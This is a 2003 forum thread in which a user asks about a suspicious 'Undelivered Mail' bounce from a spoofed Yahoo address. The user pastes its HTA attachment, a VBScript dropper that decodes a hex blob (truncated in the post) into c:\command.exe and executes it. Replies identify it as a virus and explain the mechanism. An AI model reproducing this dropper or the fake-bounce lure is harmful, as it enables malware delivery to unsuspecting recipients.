I got a strange email from yahoo....

[Chaotic42]

--
From: "MAILER-DAEMON" <MAILER-DAEMON@yahoo.com>
To: <chaotic42@blahpobox.com>
Date: Wed, 21 May 2003 15:53:00 -0700
Subject: Undelivered Mail Returned to Sender

[-- Attachment #1 --]
[-- Type: text/plain, Encoding: 7bit, Size: 0.1K --]

There were errors processing you mail. Please, read detailed information in the
+attachment
[-- Attachment #2: error.hta --]
[-- Type: application/hta, Encoding: base64, Size: 14K --]

[-- application/hta is unsupported (use 'v' to view this part) --]

<title>Error</title>^M
<script language=vbs>^M
malware="4d,5a,90,0,3,0,0..."

^M
tmp = Split(malware, ",")^M
path = "c:\command.exe"^M
Set fso = CreateObject("Scripting.FileSystemObject")^M
Set shell = CreateObject("WScript.Shell")^M
Set f = fso.CreateTextFile(path, ForWriting)^M
For i = 0 To UBound(tmp)^M
l = Len(tmp(i))^M
malware = Int("&H" & Left(tmp(i), 2))^M
If l > 2 Then^M
r = Int("&H" & Mid(tmp(i), 3, l))^M
For j = 1 To r^M
f.Write Chr(malware)^M
Next^M
Else^M
f.Write Chr(malware)^M
End If^M
Next^M
f.Close^M
runscr=1^M
if runscr then shell.run(path)^M
^M
</script>
--

The malware variable was huge. Pages and pages. Any idea what this is? I got it from <MAILER-DAEMON@yahoo.com>.

Weird.

 

[KingNothing]

It's a virus from a spoofed e-mail address.

 

[Chaotic42]

Originally posted by: KingNothing
It's a virus from a spoofed e-mail address.

I figured that's what it was. I've never gotten a non-klez virus emailed to me before. Any idea which one this is?

 

[sciencewhiz]

the bunch of hex characters that you omitted are an EXE file. The script writes that file and then executes it. I haven't been able to figure out exactly what virus this is. possible this one: http://vil.nai.com/vil/content/v_99806.htm or a variation of it.

 

[Chess]

Originally posted by: KingNothing
It's a virus from a spoofed e-mail address.

exactly what he said...